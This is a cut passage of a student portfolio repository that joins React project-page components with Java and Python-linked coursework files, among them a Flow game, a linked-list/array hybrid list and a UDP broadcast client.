<Title level={1}>Analog to Digital Converter - Lab 6</Title>
<Title level={4}>Technology: C, Embedded Systems</Title>
In this project, my team and I configured the WiFi cabability of the robot.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab6.c (click on image to download file)</Title>
<a href={lab6C} download="lab6.c">
<img width='100%' src={lab6PNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/TransClasses/TransClasses.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ConwayTransformJava from './ConwayTransform.java';
import ConwayTransformPNG from './ConwayTransform.png';
import GridUtil from './GridUtil.java';
import GridUtilSS1 from './GridUtilSS1.png';
import GridUtilSS2 from './GridUtilSS2.png';
import LifeTestJava from './LifeTest.java';
import LifeTestPNG from './LifeTest.png';
import ProjectFiles from './miniAssignment2.zip';
import output from './output.gif';
import SmoothingTransformJava from './SmoothingTransform.java';
import SmoothingTransformPNG from './SmoothingTransform.png';
const Title = Typography.Title;
export default class TransClasses extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Transformation Classes - Assignment 2</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
This program performs transformation operations on 2 dimensional arrays.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>ConwayTransform.java (click on image to download file</Title>
<a href={ConwayTransformJava} download="ConwayTransform.java">
<img width='100%' src={ConwayTransformPNG} alt=''/>
</a>
<Title level={4}>SmoothingTransform.java (click on image to download file</Title>
<a href={SmoothingTransformJava} download="SmoothingTransform.java">
<img width='100%' src={SmoothingTransformPNG} alt=''/>
</a>
<Title level={4}>GridUtil.java (click on image to download file</Title>
<a href={GridUtil} download="GridUtil.java">
<img width='100%' src={GridUtilSS1} alt=''/>
<img width='100%' src={GridUtilSS2} alt=''/>
</a>
<Title level={4}>LifeTest.java (click on image to download file</Title>
<a href={LifeTestJava} download="LifeTest.java">
<img width='100%' src={LifeTestPNG} alt=''/>
</a>
<Title level={4}>Output of LifeTest.java</Title>
<img width='50%' src={output} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/ComS319/GameMain.java
package ui;
import java.awt.Color;
import java.awt.Dimension;
import javax.swing.BoxLayout;
import javax.swing.JFrame;
import javax.swing.JPanel;
import javax.swing.SwingUtilities;
import assignment1.TicTacToe;
/**
* Main class for a GUI for a TicTacToe game sets up a GamePanel instance in a
* frame.
*
* @author <NAME>
*/
public class GameMain {
/**
* Line width in pixels.
*/
public static final int LINE_SIZE = 6;
/**
* Font size for displaying score.
*/
public static final int SCORE_FONT = 24;
/**
* Background color.
*/
public static final Color BACKGROUND_COLOR = Color.WHITE;
/**
* Color for grid lines.
*/
public static final Color GRID_COLOR = Color.BLACK;
/**
* Method used for instantiating the components.
*/
private static void create() {
TicTacToe match = new TicTacToe();
ScorePanel scorePanel = new ScorePanel();
GamePanel panel = new GamePanel(scorePanel, match);
ChooseButtonPanel choosePanel = new ChooseButtonPanel(panel, scorePanel);
JPanel mainPanel = new JPanel();
mainPanel.setLayout(new BoxLayout(mainPanel, BoxLayout.Y_AXIS));
mainPanel.add(choosePanel);
mainPanel.add(scorePanel);
mainPanel.add(panel);
JFrame frame = new JFrame("Com S 227 Flow Game");
frame.getContentPane().add(mainPanel);
Dimension d = new Dimension(300, 300);
panel.setPreferredSize(d);
d = new Dimension(300, 100);
scorePanel.setPreferredSize(d);
d = new Dimension(300, 100);
choosePanel.setPreferredSize(d);
frame.pack();
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
frame.setVisible(true);
}
/**
* Main method that initiates the program
* @param args
*/
public static void main(String[] args) {
Runnable r = new Runnable() {
public void run() {
create();
}
};
SwingUtilities.invokeLater(r);
}
}
<file_sep>/src/ClassComponents/ComS227/TallyClass/TallyNumberTest.java
package mini1;
public class TallyNumberTest {
public static void main(String[] args){
TallyNumber t1 = new TallyNumber("| *");
TallyNumber t2 = new TallyNumber("| ** 0 ||");
t1.combine(t2);
System.out.println(t1.getStringValue());
}
}<file_sep>/src/Components/AWSAPI/AWSAPI.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ApplicationJava from './Application.java';
import ApplicationPNG from './Application.png';
import configJava from './config.java';
import configPNG from './Config.png';
import UserJava from './User.java';
import UserPNG from './User.png';
import UserControllerJava from './UserController.java';
import UserControllerPNG from './UserController.png';
import UserRepoJava from './UserRepo.java';
import UserRepoPNG from './UserRepo.png';
const Title = Typography.Title;
export default class AWSAPI extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Amazon Web Services - Web API</Title>
<Title level={4}>Technology: Amazon Web Services, Java, Eclipse, MySQL</Title>
This project is an example of a simple web service on AWS using backend technology.
I used AWS Codestar to create the server instance and AWS Relational Database Service (RDS)
for the database. I was able to run my project locally while using Amazon's RDS.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>Application.java (click on image to download file):</Title>
<a href={ApplicationJava} download="Application.java">
<img width='100%' src={ApplicationPNG} alt=''/>
</a>
<Title level={4}>UserController.java (click on image to download file):</Title>
<a href={UserControllerJava} download="UserController.java">
<img width='100%' src={UserControllerPNG} alt=''/>
</a>
<Title level={4}>User.java (click on image to download file):</Title>
<a href={UserJava} download="UserJava.java">
<img width='100%' src={UserPNG} alt=''/>
</a>
<Title level={4}>UserRepo.java (click on image to download file):</Title>
<a href={UserRepoJava} download="UserRepo.java">
<img width='100%' src={UserRepoPNG} alt=''/>
</a>
<Title level={4}>Config.java (click on image to download file):</Title>
<a href={configJava} download="config.java">
<img width='100%' src={configPNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/A3/FlowGame.java
package hw3;
import java.util.ArrayList;
import api.Cell;
import api.Flow;
/**
* Game state for a Flow Free game.
*/
public class FlowGame{
/**
* Constructs a FlowGame to use the given array of Flows and
* the given width and height. Client is responsible for ensuring that all
* cells in the given flows have row and column values within
* the given width and height.
* @param givenFlows
* an array of Flow objects
* @param givenWidth
* width to use for the game
* @param givenHeight
* height to use for the game
*/
private int width;
private int height;
private Flow[] allFlows;
private Cell current = null;
private int currentFlowf = 0;
public FlowGame(Flow[] givenFlows, int givenWidth, int givenHeight){
// TODO
width = givenWidth;
height = givenHeight;
allFlows = givenFlows;
}
/**
* Constructs a FlowGame from the given descriptor.
* @param descriptor
* array of strings representing initial endpoint positions
*/
public FlowGame(String[] descriptor){
// TODO
allFlows = Util.createFlowsFromStringArray(descriptor);
height = descriptor.length;
width = descriptor[0].length();
}
/**
* Returns the width for this game.
* @return
* width for this game
*/
public int getWidth(){
// TODO
return width;
}
/**
* Returns the height for this game.
* @return
* height for this game
*/
public int getHeight(){
// TODO
return height;
}
/**
* Returns the current cell for this game, possible null.
* @return
* current cell for this game
*/
public Cell getCurrent(){
// TODO
return current;
}
/**
* Returns all flows for this game. Client should not modify
* the returned array or lists.
* @return
* array of flows for this game
*/
public Flow[] getAllFlows(){
// TODO
return allFlows;
}
/**
* Returns the number of occupied cells in all flows (including endpoints).
* @return
* occupied cells in this game
*/
public int getCount(){
// TODO
return 0;
}
/**
* Returns true if all flows are complete and all cells are occupied.
* @return
* true if all flows are complete and all cells are occupied
*/
public boolean isComplete(){
// TODO
int numComplete = 0;
for(int i = 0; i < allFlows.length; i++){
if(allFlows[i].isComplete()){
numComplete++;
}
}
for(int i = 0; i < width; i++){
for(int j = 0; j < height; j++){
if(isOccupied(j, i) == false){
return false;
}
}
}
if(numComplete == allFlows.length){
return true;
}
return false;
}
/**
* Attempts to set the "current" cell to be an existing cell at the given
* row and column. When using a GUI, this method is typically
* invoked when the mouse is pressed.
* <ul>
* <li>Any endpoint can be selected as the current cell. Selecting an
* endpoint clears the flow associated with that endpoint.
* <li>A non-endpoint cell can be selected as the current cell only if
* it is the last cell in a flow.
* </ul>
* If neither of the above conditions is met, this method does nothing.
*
* @param row
* given row
* @param col
* given column
*/
public void startFlow(int row, int col){
// TODO
endFlow();
for(int i = 0; i < allFlows.length; i++){
for(int j = 0; j < 2; j++){
if(allFlows[i].getEndpoint(j).positionMatches(row, col)){
allFlows[i].clear();
current = allFlows[i].getEndpoint(j);
currentFlowf = i;
allFlows[i].add(current);
}
}
}
for(int i = 0; i < allFlows.length; i++){
Cell last;
ArrayList<Cell> cells = new ArrayList<Cell>();
cells = allFlows[i].getCells();
if(cells.size() > 0){
last = cells.get(cells.size() - 1);
if(last.getRow() == row && last.getCol() == col){
current = last;
currentFlowf = i;
}
}
}
}
/**
* Clears the "current" cell. That is, directly after invoking this method,
* <code>getCurrent</code> returns null. When using a GUI, this method is
* typically invoked when the mouse is released.
*/
public void endFlow(){
// TODO
current = null;
}
/**
* Attempts to add a new cell to the flow containing the current cell.
* When using a GUI, this method is typically invoked when the mouse is
* dragged. In order to add a cell, the following conditions must be satisfied:
* <ol>
* <li>The current cell is non-null
* <li>The given position is horizontally or vertically adjacent to the
* current cell
* <li>The given position either is not occupied OR it is occupied by
* an endpoint for the flow that is not already in the flow
* </ul>
* If the three conditions are met, a new cell with the given row/column
* and correct color is added to the current flow, and the current cell
* is updated to be the new cell.
*
* @param row
* given row for the new cell
* @param col
* given column for the new cell
*/
public void addCell(int row, int col){
// TODO
boolean isEndpoint = false;
for(Flow f : allFlows){ //check to see if position is endpoint
for(int j = 0; j < 2; j++){
if(f.getEndpoint(j).positionMatches(row, col) && f.getColor() == allFlows[currentFlowf].getColor()){
isEndpoint = true;
}
}
}
if(current != null && (isOccupied(row, col) == false || isEndpoint) && allFlows[currentFlowf].isComplete() == false){
if(((current.getCol() - col) <= 1 && (current.getCol() - col) >= -1) && (current.getRow() - row) == 0){
Cell temp = new Cell(row, col, allFlows[currentFlowf].getColor());
current = temp;
allFlows[currentFlowf].add(temp);
}
if(((current.getRow() - row) <= 1 && (current.getRow() - row) >= -1) && (current.getCol() - col) == 0){
Cell temp = new Cell(row, col, allFlows[currentFlowf].getColor());
current = temp;
allFlows[currentFlowf].add(temp);
}
}
}
/**
* Returns true if the given position is occupied by a cell in a flow in
* this game (possibly an endpoint).
* @param row
* given row
* @param col
* given column
* @return
* true if any cell in this game has the given row and column, false otherwise
*/
public boolean isOccupied(int row, int col){
// TODO
for(int i = 0; i < allFlows.length; i++){
for(int j = 0; j < 2; j++){
if(allFlows[i].getEndpoint(j).getRow() == row && allFlows[i].getEndpoint(j).getCol() == col){
return true;
}
}
ArrayList<Cell> currentCells = new ArrayList<Cell>();
currentCells = allFlows[i].getCells();
for(int j = 0; j < currentCells.size(); j++){
if(currentCells.get(j).getRow() == row && currentCells.get(j).getCol() == col){
return true;
}
}
}
return false;
}
}<file_sep>/src/ClassComponents/ComS311/Project2/Project2.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import project2Q1 from './project2Q1.png';
import project2Q1slide from './project2Q1slide.png';
import project2Q2slide1 from './project2Q2slide1.png';
import project2Q2slide2 from './project2Q2slide2.png';
import project2Q2slide3 from './project2Q2slide3.png';
import project2Q2ss1 from './project2Q2ss1.png';
import project2Q2ss2 from './project2Q2ss2.png';
import project2Q3slide1 from './project2Q3slide1.png';
import project2Q3slide2 from './project2Q3slide2.png';
import project2Q3ss1 from './project2Q3ss1.png';
import project2Q3ss2 from './project2Q3ss2.png';
import project2Q4ss1 from './project2Q4ss1.png';
import project2Q4ss2 from './project2Q4ss2.png';
import project2Q4ss3 from './project2Q4ss3.png';
import q1 from './q1.py';
import q2 from './q2.py';
import q4 from './q4.py';
import q5 from './q5.py';
const Title = Typography.Title;
export default class Project2 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>String Matching Algorithms (Word Searching) - Project 2</Title>
<Title level={4}>Technology: Python, Visual Studio Code</Title>
<Title level={2}>Question 1</Title>
This algorithm find the longest common substring between two input strings using recursion.
This method uses a top-down recursive approach with a cache to store previously calculated results
from the recursive calls. The lecture slide below graphically shows the steps of the algorithms.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<img width='100%' src={project2Q1slide} alt=''/>
<Title level={4}>q1.py (click on image to download code)</Title>
<a href={q1} download="q1.py">
<img width='100%' src={project2Q1} alt=''/>
</a>
<Title level={2}>Question 2</Title>
This algorithm is similar to the last but it uses a bottom-up approach instead. It first
fills a table with the lengths all combinations of the longest common substrings. Then it
retrieves the answer by back-tracing through the table with the findResult() function.
<img width='100%' src={project2Q2slide1} alt=''/>
<img width='100%' src={project2Q2slide2} alt=''/>
<img width='100%' src={project2Q2slide3} alt=''/>
<Title level={4}>q2.py (click on image to download code)</Title>
<a href={q2} download="q2.py">
<img width='100%' src={project2Q2ss1} alt=''/>
<img width='100%' src={project2Q2ss2} alt=''/>
</a>
<Title level={2}>Question 3</Title>
The scenario for this problem is that there are two versions of text with multiple lines
and the differences between them need to be tracked. For each line, the algorithm outputs a 'T' for
transfer, 'D' for delete, 'I' for insert and 'S' for substitution. Following the letter is the older
version of the line. Following this is the new version of the line. The algorithm finds the edit
distance between the two versions.
<img width='100%' src={project2Q3slide1} alt=''/>
<img width='100%' src={project2Q3slide2} alt=''/>
<Title level={4}>q3.py (click on image to download code)</Title>
<a href={q4} download="q3.py">
<img width='100%' src={project2Q3ss1} alt=''/>
<img width='100%' src={project2Q3ss2} alt=''/>
</a>
<Title level={2}>Question 4</Title>
This problem uses the answer from the previous and the longest common substring algorithm.
The output is the same as the last problem except it uses double brackets to signify character
changes within each line on substitutions.
<Title level={4}>q4.py (click on image to download code)</Title>
<a href={q5} download="q4.py">
<img width='100%' src={project2Q4ss1} alt=''/>
<img width='100%' src={project2Q4ss2} alt=''/>
<img width='100%' src={project2Q4ss3} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/CPRE186/BroadcastClient.java
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.net.MulticastSocket;
import java.util.Scanner;
import java.net.InetSocketAddress;
import javax.swing.JOptionPane;
import javax.swing.JDialog;
import javax.swing.JFrame;
import java.awt.Desktop;
import java.io.File;
public class BroadcastClient {
public static void main(String[] args) {
// TODO Auto-generated method stub
// Scanner in = new Scanner(System.in);
// System.out.println("Enter message to broadcast to all clients:");
// String message = in.nextLine();
// in.close();
String filename = "";
// byte[] sendData = filename.getBytes();
byte[] receiveData = new byte[1000];
try {
DatagramSocket clientSocket = new DatagramSocket(null);
clientSocket.setReuseAddress(true);
clientSocket.bind(new InetSocketAddress(15002));
//System.out.print("\033[2J\033[H");
while(true){
receiveData = new byte[1000];
// send message to server
// InetAddress localhost = InetAddress.getByName("127.0.0.1");
// DatagramPacket sendPacket = new DatagramPacket(sendData, sendData.length, localhost, 15002);
// clientSocket.send(sendPacket);
// receive message from server
DatagramPacket receivePacket = new DatagramPacket(receiveData, receiveData.length);
clientSocket.receive(receivePacket);
filename = new String(receivePacket.getData());
// System.out.println(" " + message);
// JOptionPane.showMessageDialog(null, message, "Message from Server", JOptionPane.PLAIN_MESSAGE);
// final JOptionPane pane = new JOptionPane(message);
// final JDialog d = pane.createDialog((JFrame)null, "Message from Server");
// d.setLocation(50,100);
// d.setVisible(true);
Desktop.getDesktop().open(new File("/Users/benalexander/School/ComS227/cpre186"+filename));
clientSocket.close();
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
<file_sep>/src/ClassComponents/ComS228/Project3/AdaptiveList.java
package edu.iastate.cs228.hw3;
/*
* @author
*
* An implementation of List<E> based on a doubly-linked list with an array for indexed reads/writes
*
*/
import java.lang.reflect.Array;
import java.util.Arrays;
import java.util.Collection;
import java.util.Iterator;
import java.util.List;
import java.util.ListIterator;
import java.util.NoSuchElementException;
/**
*
* @author benalexander
*
* @param <E>
*/
public class AdaptiveList<E> implements List<E> {
/**
*
* @author benalexander
*
*/
public class ListNode // private member of outer class
{
public E data; // public members:
public ListNode link; // used outside the inner class
public ListNode prev; // used outside the inner class
/**
* Constructor for ListNode
* @param item
*/
public ListNode(E item) {
data = item;
link = prev = null;
}
}
public ListNode head; // dummy node made public for testing.
public ListNode tail; // dummy node made public for testing.
private int numItems; // number of data items
private boolean linkedUTD; // true if the linked list is up-to-date.
public E[] theArray; // the array for storing elements
private boolean arrayUTD; // true if the array is up-to-date.
/**
* Default constructor for AdaptiveList
*/
public AdaptiveList() {
clear();
}
/**
* Method is used to initialize the list
*/
@Override
public void clear() {
head = new ListNode(null);
tail = new ListNode(null);
head.link = tail;
tail.prev = head;
numItems = 0;
linkedUTD = true;
arrayUTD = false;
theArray = null;
}
/**
* determines if the linked list is up to date
* @return linkedUTD
*/
public boolean getlinkedUTD() {
return linkedUTD;
}
/**
* determines if the array is up to date
* @return arrayUTD
*/
public boolean getarrayUTD() {
return arrayUTD;
}
/**
* Constructor used for taking a collection as an input
* @param c
*/
public AdaptiveList(Collection<? extends E> c) {
// TODO
head = new ListNode(null);
tail = new ListNode(null);
head.link = tail;
tail.prev = head;
ListNode current = head;
int count = 0;
for (E e : c) {
ListNode toAdd = new ListNode(e);
link(current, toAdd);
current = toAdd;
count++;
}
numItems = count;
linkedUTD = true;
arrayUTD = false;
theArray = null;
}
// Removes the node from the linked list.
// This method should be used to remove a node from the linked list.
private void unlink(ListNode toRemove) {
if (toRemove == head || toRemove == tail)
throw new RuntimeException("An attempt to remove head or tail");
toRemove.prev.link = toRemove.link;
toRemove.link.prev = toRemove.prev;
}
// Inserts new node toAdd right after old node current.
// This method should be used to add a node to the linked list.
private void link(ListNode current, ListNode toAdd) {
if (current == tail)
throw new RuntimeException("An attempt to link after tail");
if (toAdd == head || toAdd == tail)
throw new RuntimeException("An attempt to add head/tail as a new node");
toAdd.link = current.link;
toAdd.link.prev = toAdd;
toAdd.prev = current;
current.link = toAdd;
}
/**
* Used to update theArray if the list and theArray differ
*/
private void updateArray() // makes theArray up-to-date.
{
if (numItems < 0)
throw new RuntimeException("numItems is negative: " + numItems);
if (!linkedUTD)
throw new RuntimeException("linkedUTD is false");
// TODO
ListNode node = head;
theArray = (E[]) new Object[numItems];
for (int i = 0; i < numItems; i++) {
node = node.link;
theArray[i] = node.data;
}
arrayUTD = true;
}
/**
* Used to update the list if theArray and the list differ
*/
private void updateLinked() // makes the linked list up-to-date.
{
if (numItems < 0)
throw new RuntimeException("numItems is negative: " + numItems);
if (!arrayUTD)
throw new RuntimeException("arrayUTD is false");
if (theArray == null || theArray.length < numItems)
throw new RuntimeException("theArray is null or shorter");
// TODO
ListNode node = head;
for (int i = 0; i < theArray.length; i++) {
node = node.link;
node.data = theArray[i];
}
linkedUTD = true;
}
/**
* Returns the number of elements in this list
* @return the number of elements in this list
*/
@Override
public int size() {
// TODO
if(!linkedUTD){
updateLinked();
}
return numItems; // may need to be revised.
}
/**
* Returns true if this list contains no elements
* @return true if this list contains no elements
*/
@Override
public boolean isEmpty() {
// TODO
if(!linkedUTD){
updateLinked();
}
if (head.link == tail) {
return true;
} else {
return false;
}
}
/**
* Appends the specified element to the end of this list
* @return true
* @param e - element to be appended to this list
*/
@Override
public boolean add(E obj) throws NullPointerException, IllegalArgumentException {
// TODO
if(!linkedUTD){
updateLinked();
}
ListNode newNode = new ListNode(obj);
link(tail.prev, newNode);
arrayUTD = false;
numItems++;
return true; // may need to be revised.
}
/**
* Appends all of the elements in the specified collection to the end of this list,
* in the order that they are returned by the specified collection's iterator
* @param c - collection containing elements to be added to this list
* @return true if this list changed as a result of the call
*/
@Override
public boolean addAll(Collection<? extends E> c) throws NullPointerException{
// TODO
if(!linkedUTD){
updateLinked();
}
int before = numItems;
if(!c.isEmpty()){
E[] array = (E[]) c.toArray();
int size = array.length;
for (int i = 0; i < size; i++) {
ListNode newNode = new ListNode(array[i]);
link(tail.prev, newNode);
arrayUTD = false;
numItems++;
}
}
int after = numItems;
if(before == after){
return false;
}
return true; // may need to be revised.
} // addAll 1
/**
* Removes the first occurrence of the specified element from this list, if it is present
* @param o - element to be removed from this list, if present
* @return true if this list contained the specified element
*/
@Override
public boolean remove(Object obj) {
// TODO
if(!linkedUTD){
updateLinked();
}
ListNode current = head;
int size = numItems;
for (int i = 0; i < size; i++) {
current = current.link;
if (current.data == obj) {
unlink(current);
arrayUTD = false;
numItems--;
return true;
}
}
return false;
}
private void checkIndex(int pos) // a helper method
{
if (pos >= numItems || pos < 0)
throw new IndexOutOfBoundsException("Index: " + pos + ", Size: " + numItems);
}
private void checkIndex2(int pos) // a helper method
{
if (pos > numItems || pos < 0)
throw new IndexOutOfBoundsException("Index: " + pos + ", Size: " + numItems);
}
private void checkNode(ListNode cur) // a helper method
{
if (cur == null || cur == tail)
throw new RuntimeException("numItems: " + numItems + " is too large");
}
/**
* find the node in the list at the given position(first element has position 0)
* @param pos
* @return ListNode at pos
*/
private ListNode findNode(int pos) // a helper method
{
ListNode cur = head;
for (int i = 0; i < pos; i++) {
checkNode(cur);
cur = cur.link;
}
checkNode(cur);
return cur;
}
/**
* Inserts the specified element at the specified position in this list
* @param pos - index at which the specified element is to be inserted
* @param obj - element to be inserted
*/
@Override
public void add(int pos, E obj) throws IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos > size()) {
throw new IndexOutOfBoundsException("Index out of bounds");
}
if(!linkedUTD){
updateLinked();
}
if (isEmpty()) {
ListNode node = new ListNode(obj);
link(tail.prev, node);
arrayUTD = false;
numItems++;
} else {
ListNode newNode = new ListNode(obj);
ListNode current = head.link;
for (int i = 0; i < pos; i++) {
current = current.link;
}
link(current.prev, newNode);
arrayUTD = false;
numItems++;
}
}
/**
* Inserts all of the elements in the specified collection into this list at the specified position
* @param index - index at which to insert the first element from the specified collection
* @param c - collection containing elements to be added to this list
* @return true if this list changed as a result of the call
*/
@Override
public boolean addAll(int pos, Collection<? extends E> c) throws NullPointerException, IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos > size()) {
throw new IndexOutOfBoundsException("Index out of bounds");
}
if(!linkedUTD){
updateLinked();
}
if (isEmpty()) {
int before = numItems;
addAll(c);
int after = numItems;
if(before == after){
return false;
}
return true;
}
else {
ListNode current = head;
for (int i = 0; i < pos; i++) {
current = current.link;
}
int before = numItems;
E[] array = (E[]) c.toArray();
int size = array.length;
for (int i = 0; i < size; i++) {
ListNode newNode = new ListNode(array[i]);
link(current, newNode);
arrayUTD = false;
current = newNode;
numItems++;
}
int after = numItems;
if(before == after){
return false;
}
return true;
}
}
/**
* Removes the element at the specified position in this list
* @param index - the index of the element to be removed
* @return the element previously at the specified position
*/
@Override
public E remove(int pos) throws IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos >= numItems) {
throw new IndexOutOfBoundsException("Index is out of bounds");
}
else {
if(!linkedUTD){
updateLinked();
}
arrayUTD = false;
E toRemove = get(pos);
ListNode node = findNode(pos + 1);
unlink(node);
arrayUTD = false;
numItems--;
return toRemove;
}
}
/**
* Returns the element at the specified position in this list.
* @param index - index of the element to return
* @return the element at the specified position in this list
*/
@Override
public E get(int pos) throws IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos >= numItems) {
throw new IndexOutOfBoundsException("Index is out of bounds");
} else {
if (arrayUTD) {
return theArray[pos];
}
else {
updateArray();
return theArray[pos];
}
}
}
/**
* Replaces the element at the specified position in this list with the specified element
* @param index - index of the element to replace
* @param element - element to be stored at the specified position
* @return the element previously at the specified position
*/
@Override
public E set(int pos, E obj) throws IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos >= numItems) {
throw new IndexOutOfBoundsException("Index is out of bounds");
}
else {
if(!arrayUTD){
updateArray();
}
linkedUTD = false;
E e = theArray[pos];
theArray[pos] = obj;
return e;
}
}
/**
* If the number of elements is at most 1, the method returns false.
* Otherwise, it reverses the order of the elements in the array
* without using any additional array, and returns true.
* Note that if the array is modified, then linkedUTD needs to be set to
* false.
* @return true if theArray changed
*/
public boolean reverse() {
// TODO
if (numItems <= 1) {
return false;
}
else {
if(!arrayUTD){
updateArray();
}
linkedUTD = false;
for (int i = 0; i < numItems / 2; i++) {
E temp = theArray[theArray.length - i];
theArray[theArray.length - i] = theArray[i];
theArray[i] = temp;
}
return true;
}
}
/**
* Returns true if this list contains the specified element
* @param o - element whose presence in this list is to be tested
* @return true if this list contains the specified element
*/
@Override
public boolean contains(Object obj) {
// TODO
if(!linkedUTD){
updateLinked();
}
ListNode node = head;
for (int i = 0; i < numItems; i++) {
node = node.link;
if (node.data == obj) {
return true;
}
}
return false;
}
/**
* Returns true if this list contains all of the elements of the specified collection.
* @param c - collection to be checked for containment in this list
* @return true if this list contains all of the elements of the specified collection
*/
@Override
public boolean containsAll(Collection<?> c) throws NullPointerException {
// TODO
if (c == null) {
throw new NullPointerException("Given collection is null");
}
else {
if(!linkedUTD){
updateLinked();
}
if(c.isEmpty() && head.link == tail){
return true;
}
for (Object e : c) {
if (!contains(e)) {
return false;
}
}
return true;
}
}
/**
* Returns the index of the first occurrence of the specified element in this
* list, or -1 if this list does not contain the element.
* @param o - element to search for
* @return the index of the first occurrence of the specified element in this
* list, or -1 if this list does not contain the element
*/
@Override
public int indexOf(Object obj) {
// TODO
if(!linkedUTD){
updateLinked();
}
for (int i = 0; i < numItems; i++) {
if (obj.equals(get(i))) {
return i;
}
}
return -1;
}
/**
* Returns the index of the last occurrence of the specified element in this
* list, or -1 if this list does not contain the element.
* @param o - element to search for
* @return the index of the last occurrence of the specified element in this
* list, or -1 if this list does not contain the element
*/
@Override
public int lastIndexOf(Object obj) {
// TODO
if(!linkedUTD){
updateLinked();
}
int last = -1;
for (int i = 0; i < numItems; i++) {
if (obj.equals(get(i))) {
last = i;
}
}
if (last == -1) {
return -1;
} else {
return last;
}
}
/**
* Removes from this list all of its elements that are contained in the specified collection
* @param c - collection containing elements to be removed from this list
* @return true if this list changed as a result of the call
*/
@Override
public boolean removeAll(Collection<?> c) {
// TODO
if(!linkedUTD){
updateLinked();
}
boolean changed = false;
if(c.size() == 0){
return changed;
}
for (Object o : c) {
ListNode current = head;
int numRemoved = 0;
for(int i = 0; i < numItems; i++){
current = current.link;
if(o == current.data){
unlink(current);
arrayUTD = false;
numRemoved++;
changed = true;
}
}
numItems = numItems - numRemoved;
}
return changed;
}
/**
* Retains only the elements in this list that are contained in the specified collection
* @param c - collection containing elements to be retained in this list
* @return true if this list changed as a result of the call
*/
@Override
public boolean retainAll(Collection<?> c) throws NullPointerException{
// TODO
if(c == null){
throw new NullPointerException("Given collection is null");
}
if(!linkedUTD){
updateLinked();
}
boolean changed = false;
ListNode current = head;
for(int i = 0; i < numItems; i++){
current = current.link;
boolean inList = false;
for(Object e : c){
if(current.data == e){
inList = true;
}
}
if(!inList){
ListNode node = head;
int numRemoved = 0;
for(int j = 0; j < numItems; j++){
node = node.link;
if(current == node){
unlink(current);
arrayUTD = false;
numRemoved++;
changed = true;
}
}
numItems = numItems - numRemoved;
}
}
return changed;
}
/**
* Returns an array containing all of the elements in this list in proper sequence
* @return an array containing all of the elements in this list in proper sequence
*/
@Override
public Object[] toArray() {
// TODO
if(!linkedUTD){
updateLinked();
}
ListNode current = head;
Object[] array = new Object[numItems];
for (int i = 0; i < numItems; i++) {
current = current.link;
array[i] = current.data;
}
return array; // may need to be revised.
}
/**
* Returns an array containing all of the elements in this list in proper sequence
* (from first to last element); the runtime type of the returned array is that of the
* specified array. If the list fits in the specified array, it is returned therein.
* Otherwise, a new array is allocated with the runtime type of the specified array and
* the size of this list.
* @param a - the array into which the elements of this list are to be stored,
* if it is big enough; otherwise, a new array of the same runtime type is allocated
* for this purpose.
* @returnan array containing the elements of this list
*/
@Override
public <T> T[] toArray(T[] arr) throws NullPointerException {
// TODO
if(!linkedUTD){
updateLinked();
}
if (arr == null) {
throw new NullPointerException("Given array is null");
}
else if (arr.length == numItems) {
ListNode current = head;
for (int i = 0; i < numItems; i++) {
current = current.link;
arr[i] = (T) current.data;
}
return arr;
}
else if (arr.length < numItems) {
ListNode current = head;
final T[] array = (T[]) Array.newInstance(arr.getClass().getComponentType(), numItems);
for (int i = 0; i < numItems; i++) {
current = current.link;
array[i] = (T) current.data;
}
return array;
}
else if (arr.length > numItems){
ListNode current = head;
for (int i = 0; i < numItems; i++) {
current = current.link;
arr[i] = (T) current.data;
if(i == numItems - 1){
arr[i + 1] = null;
}
}
return arr;
}
else {
return null;
}
}
@Override
public List<E> subList(int fromPos, int toPos) {
throw new UnsupportedOperationException();
}
/**
*
* @author benalexander
*
*/
private class AdaptiveListIterator implements ListIterator<E> {
private int index; // index of next node;
private ListNode cur; // node at index - 1
private ListNode last; // node last visited by next() or previous()
private boolean calledNext = false;
private int calledPrev = 2;
private boolean calledAdd = false;
private boolean canRemove = false;
private boolean calledRemove = false;
/**
* Default constructor for ListIterator
*/
public AdaptiveListIterator() {
if (!linkedUTD)
updateLinked();
// TODO
index = 0;
cur = head.link;
}
/**
* Constructor used for taking a position input. cur is set to the corresponding node
* at pos
* @param pos
*/
public AdaptiveListIterator(int pos) {
if (!linkedUTD)
updateLinked();
// TODO
index = pos;
ListNode node = head.link;
for (int i = 0; i < pos; i++) {
node = node.link;
}
cur = node;
}
/**
* Returns true if this list iterator has more elements when traversing the list in
* the forward direction.
* @return true if the list iterator has more elements when traversing
* the list in the forward direction
*/
@Override
public boolean hasNext() {
// TODO
if (cur == tail || (tail.prev == cur && (calledNext))) {
return false;
}
else {
return true;
}
}
/**
* Returns the next element in the list and advances the cursor position.
* @return the next element in the list
*/
@Override
public E next() throws NoSuchElementException {
// TODO
calledAdd = false;
canRemove = true;
calledRemove = false;
if (cur == tail) {
throw new NoSuchElementException("Iteration has no next element");
